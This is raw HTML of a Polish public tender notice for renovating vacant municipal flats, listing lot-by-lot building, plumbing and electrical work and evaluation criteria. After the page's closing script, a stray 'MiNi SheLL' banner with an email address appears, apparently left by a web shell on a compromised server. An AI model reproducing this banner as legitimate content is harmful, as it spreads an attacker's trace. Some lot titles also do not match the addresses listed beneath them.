<br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17"></span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5"></span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> <table><tr><td><b>Część nr: </b></td><td>1</td><td><b>Nazwa: </b></td><td>Remont lokali komunalnych mieszkalnych - pustostanów obejmujących I ZADANIE ul. Krasińskiego 2 m. 11 ul. Krasińskiego 27 m. 70 ul. Krasińskiego 27 m. 31 ul. Marii Kazimiery 18/26 m. 62</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres robót Lok. 1 przy ul. Krasińskiego 20 m.11Branża budowlanaWymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, regulacja okien, montaż nawiewników, naprawa tynku (uzupełnienie ubytków po hakach), wykonanie pasów tynku po wymianie instalacji elektrycznej, skucie płytek w kuchni i łazience przed wymianą instalacji elektrycznej, przygotowanie powierzchni pod malowanie, gruntowanie podłoży preparatami, dwukrotne malowanie farbami emulsyjnymi ścian i sufitów, Malowanie lamperii w kuchni, malowanie grzejników, rur, parapetów, zerwanie wykładzin PCV kuchnia korytarz i łazienka, w pokojach cyklina i lakierowanie z wymianą listew przypodłogowych, w kuchni wykładzina PCV, w łazience płytki na posadzce i glazura na ścianie, wywiezienie materiałów z rozbiórki. Branża sanitarnaWymiana kuchni gazowej 4 palnikowej z piekarnikiem, wymiana brodzika i kabiny natryskowej, wymiana miski w-c kompakt z sedesem, wymiana zlewozmywaka, umycie umywalki, wymiana baterii, wymiana podejścia i syfonu oraz udrożnienie odpływu przyborów. Próba ciśnieniowa i protokół z szczelności inst. gazowej oraz opinia kominiarska.Branża elektryczna Demontaż opraw elektrycznych, osprzętu elektrycznego, przewodów, oraz osprzętu w tablicy mieszkaniowej. Wykucie bruzd pod przewody, oraz pod puszki elektryczne.Ułożenie przewodów do obwodów oświetleniowych, i gniazd, zgodnie z wymogami, Wykucie otworów pod puszki, obsadzenie puszek. Wykonanie połączeń w puszkach, podłączenie osprzętu (wyłączników, przełączników, gniazd, przycisków), Montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, oraz lamp. Wykonanie pomiarów ochronnych i przedstawienie protokołu. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 2 przy ul. Krasińskiego 27 m. 70Branża budowlanaWymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, naprawa tynku (uzupełnienie ubytków po hakach), wykonanie pasów tynku po wymianie instalacji elektrycznej, gruntowanie podłoży, przygotowanie powierzchni pod malowanie farbami, dwukrotne malowanie farbami emulsyjnymi, malowanie grzejników, rur i parapetów, zerwanie starych wykładziny w kuchni, wykonanie nowego podłoża, wykonanie cykliny i lakierowanie parkietu w pokojach i korytarzu z wymianą listew przypodłogowych, w kuchni wykładzina PCV, skucie płytek na ścianie i wyk lamperii oraz rozebranie zabudowy pod oknem, w łazience obudowa g/k wanny i obłożenie płytkami, wykonanie nowej posadzki i wykonanie lamperii na ścianach, wywiezienie materiałów z rozbiórki. Branża sanitarnaWymiana kuchni gazowej 4 palnikowej z piekarnikiem, wymiana wanny, wymiana miski wc kompakt z sedesem, wymiana zlewozmywaka, wymiana umywalki, wymiana baterii, wymiana zaworów, podejścia i syfonu oraz udrożnienie odpływu przyborów sanitarnych. Próba szczelności inst. gazowej oraz opinia kominiarska.Branża elektryczna Demontaż opraw elektrycznych, osprzętu elektrycznego, przewodów, oraz osprzętu w tablicy mieszkaniowej. Wykucie bruzd pod przewody, oraz pod puszki elektryczne.Ułożenie przewodów do obwodów oświetleniowych, i gniazd, zgodnie z wymogami, Wykucie otworów pod puszki, obsadzenie puszek. Wykonanie połączeń w puszkach, podłączenie osprzętu (wyłączników, przełączników, gniazd, przycisków), Montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, oraz lamp. Wywiezienie gruzu po remoncie.Wykonanie pomiarów ochronnych i przedstawienie protokołu. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych Wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 3 przy ul. Krasińskiego 29 m. 104 Branża budowlanaWymiana stolarki drzwiowej wewnętrznej do pokoju i łazienki. Naprawa i uzupełnienie tynku na ścianach, uzupełnienie ubytków po hakach, przygotowanie powierzchni pod malowanie farbami emulsyjnymi, gruntowanie podłoży, dwukrotne malowanie farbami emulsyjnymi ścian i sufitów, malowanie farbami olejnymi lamperii w kuchni, grzejników, parapetów i rur. Zerwanie starego parkietu, wykonanie nowego podłoża w pokoju i kuchni, ułożenie paneli w pokoju, w kuchni wykładziny z PCV z wymianą listew przypodłogowych, obudowa pionu kanalizacyjnego w kuchni i w łazience, łazience demontaż brodzika i ponowna jego zabudowa oraz ułożenie płytek na ścianie w kabinie natryskowej i ułożenie płytek na posadzce łazienki, wykonanie nowej fugi, montaż nawiewników w oknach, wymiana kratek wentylacyjnych, usunięcie gruzu i materiałów z rozbiórki. Branża sanitarnaWymiana kuchni elektrycznej 2 płytowej, wymiana brodzika, wymiana miski w-c kompakt z sedesem, wymiana zlewozmywaka i szafki pod zlewozmywak, wymiana umywalki, wymiana armatury baterii, wymiana zaworów, podejścia, syfonu, udrożnienie odpływu przyborów sanitarnych oraz opinia Kominiarska. Branża elektryczna Demontaż osprzętu w tablicy mieszkaniowej. Sprawdzenie instalacji domofonowej i dzwonkowej, montaż tablicy mieszkaniowej nowej wraz z zabezpieczeniami, dzwonka, Wymiana na nowe wyłączniki i gniazdka. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych, wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 4 przy ul. Powązkowska 44b m. 74 Branża budowlanaWymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, przygotowanie powierzchni pod malowanie farbami, gruntowanie podłoży preparatami, dwukrotne malowanie farbami emulsyjnymi, dwukrotne malowanie farbami olejnymi tynków lamperii, rur, zabudowa wanny w łazience, montaż nawiewników w oknach, wywiezienie materiałów z rozbiórki.Branża sanitarnaTylko przegląd i szkice Próba szczelności inst. gazowej oraz opinia Kominiarska.Branża elektryczna Wykonanie pomiarów ochronnych i przedstawienie protokołu Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych, wykonanie pomiarów ochronnych i przedstawienie protokołu.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45453000-7, 45311000-0, 45330000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-24<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin wykonania</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Remont lokali komunalnych mieszkalnych - pustostanów obejmujących II ZADANIE ul. Marii Kazimiery 1 m. 73 ul. Marii Kazimiery 1 m. 55/56 ul. Marii Kazimiery 1 m. 57/58 ul. Marii Kazimiery 1 m. 40/41</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres robót Lok. 5 przy ul. Bieniewicka 2a m. 35/36 Branża budowlanaWymiana drzwi wejściowych, wymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, naprawa tynku (uzupełnienie ubytków po hakach), wykonanie pasów tynku po wymianie instalacji elektrycznej, przygotowanie powierzchni pod malowanie, gruntowanie podłoży preparatami, malowanie farbami emulsyjnymi, malowanie grzejników, rur i parapetów, zerwanie starych wykładzin z PCV, wykonanie wylewki, ułożenie nowych paneli w pokojach i korytarzu, w kuchni wykładzina PCV, Wymiana brodzika, wykonanie nowej posadzki w łazience i wykonanie nowej zabudowy, w ubikacji malowanie lamperii, montaż nawiewników w oknach, wywiezienie materiałów z rozbiórki. Branża sanitarnaWymiana kuchni gazowej na kuchenkę elektryczną 4 palnikową, wymiana wanny, wymiana baterii wannowej wymiana miski wc kompakt z sedesem, wymiana zlewozmywaka, wymiana baterii zlewozmywakowej, wymiana umywalki, wymiana baterii, wymiana zaworów i syfonu, opinia kominiarska.Branża elektrycznaDemontaż opraw elektrycznych, osprzętu elektrycznego, przewodów, oraz osprzętu w tablicy mieszkaniowej. Wykucie bruzd pod przewody, oraz pod puszki elektryczne. Ułożenie przewodów do obwodów oświetleniowych, i gniazd. Wykucie otworów pod puszki, obsadzenie puszek. Wykonanie połączeń w puszkach, podłączenie osprzętu (wyłączników, przełączników, gniazd, przycisków) Montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, oraz lamp. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych, wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 6 przy ul. Bieniewicka 2a m 17 Branża budowlanaNaprawa i uzupełnienie tynku na ścianach w kuchni, wykonanie pasów tynku po wymianie instalacji elektrycznej, uzupełnienie dziur i ubytków po hakach, wymiana wykładziny w kuchni, przygotowanie powierzchni pod malowanie farbami emulsyjnymi, gruntowanie podłoży, dwukrotne malowanie farbami emulsyjnymi ścian i sufitów, malowanie farbami olejnymi ścian lamperia w kuchni, parapetów, grzejników i rur , naprawa, cyklinowanie i lakierowanie posadzek w pokojach z wymianą listew przypodłogowych, ułożenie wykładziny PCV z listwami w kuchni, wymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, montaż nawiewników w oknach, wymiana podokiennika, demontaż szafki w kuchni, wymiana kratek wentylacyjnych, zabezpieczeni podłóg, usunięcie gruzu i materiałów z rozbiórki.Branża sanitarnaWymiana kuchni elektrycznej 2 płytowej, montaż szafki pod kuchenkę elektryczną, wymiana brodzika, wymiana miski wc kompakt z sedesem, umycie zlewozmywaka, umycie baterii, zaworów i syfonu oraz udrożnienie odpływu przyborów sanitarnych, opinia kominiarska.Branża elektryczna Demontaż osprzętu w tablicy mieszkaniowej. Sprawdzenie instalacji domofonowej i dzwonkowej, montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, i domofonu.Wykonanie pomiarów ochronnych i przedstawienie protokołu, Wykonanie schematu elektrycznego Tablicy mieszkaniowej do INNOGY, wraz z opisem oznaczeń obwodów. elektrycznych.Lok. 7 przy ul. Marii Kazimiery 1 m. 57/58Branża budowlanaWymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, naprawa tynku (uzupełnienie ubytków po hakach), wykonanie pasów tynku po wymianie instalacji elektrycznej, przygotowanie powierzchni pod malowanie farbami, gruntowanie podłoży preparatami, dwukrotne malowanie farbami emulsyjnymi, dwukrotne malowanie farbami olejnymi lamperii, malowanie grzejników, rur i parapetów, zerwanie wykładzin i paneli, wykonanie nowego podłoża pod posadzki z wymianą listew przypodłogowych, ułożenie paneli w pokojach i korytarzu, w kuchni wykładzina z PCV, rozebranie obudowy wanny i wykonanie nowej z obłożeniem płytkami, posadzka w łazience z terakoty, montaż nawiewników w oknach, wywiezienie materiałów z rozbiórki.Branża sanitarnaWymiana kuchni gazowej 4 palnikowej z piekarnikiem, wymiana wanny, wymiana miski wc kompakt z sedesem, wymiana zlewozmywaka, wymiana umywalki, wymiana baterii, wymiana podejścia i syfonu oraz udrożnienie odpływu przyborów sanitarnych. Próba szczelności inst. gazowej oraz opinia kominiarska.Branża elektryczna Demontaż opraw elektrycznych, osprzętu elektrycznego, przewodów, oraz osprzętu w tablicy mieszkaniowej. Wykucie bruzd pod przewody, oraz pod puszki elektryczne. Ułożenie przewodów do obwodów oświetleniowych, i gniazd. Wykucie otworów pod puszki, obsadzenie puszek. Wykonanie połączeń w puszkach, podłączenie osprzętu (wyłączników, przełączników, gniazd, przycisków) Montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, oraz lamp. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych Wykonanie pomiarów ochronnych i przedstawienie protokołu.Lok. 8 przy ul. Gdańska 4a m. 28Branża budowlanaWymiana stolarki drzwiowej wewnętrznej w pokojach, kuchni i łazience, naprawa tynku (uzupełnienie ubytków po hakach), wykonanie pasów tynku po wymianie instalacji elektrycznej, przygotowanie powierzchni pod malowanie farbami, gruntowanie podłoży preparatami, dwukrotne malowanie farbami emulsyjnymi, dwukrotne malowanie farbami olejnymi lamperii w kuchni, rur i parapetów, zerwanie starej wykładziny z PCV, wykonanie nowego podłoża, ułożenie paneli w pokoju z wymianą listew przypodłogowych, w łazience rozebranie brodzika i wykonanie nowej zabudowy brodzika, wykonanie nowej posadzki z płytek, ułożenie na ścianie w pomieszczeniu kabiny natryskowej glazury, montaż nawiewników w oknach, wywiezienie materiałów z rozbiórki. Branża sanitarnaWymiana kuchni elektrycznej 2 płytowej, wymiana brodzika z kabiną natryskową, wymiana miski wc kompakt z sedesem, wymiana zlewozmywaka, wymiana baterii, wymiana syfonu oraz udrożnienie odpływu przyborów sanitarnych oraz opinia kominiarska.Branża elektryczna Demontaż opraw elektrycznych, osprzętu elektrycznego, przewodów, oraz osprzętu w tablicy mieszkaniowej. Wykucie bruzd pod przewody, oraz pod puszki elektryczne. Ułożenie przewodów do obwodów oświetleniowych, i gniazd. Wykucie otworów pod puszki, obsadzenie puszek. Wykonanie połączeń w puszkach, podłączenie osprzętu (wyłączników, przełączników, gniazd, przycisków) Montaż tablicy mieszkaniowej wraz z zabezpieczeniami, dzwonka, oraz lamp. Wykonanie schematu elektrycznego do INNOGY, wraz z opisem oznaczeń obwodów. Elektrycznych, wykonanie pomiarów ochronnych i przedstawienie <br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>45453000-7, 45311000-0, 45330000-9<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2019-12-24<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">termin wykonania</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com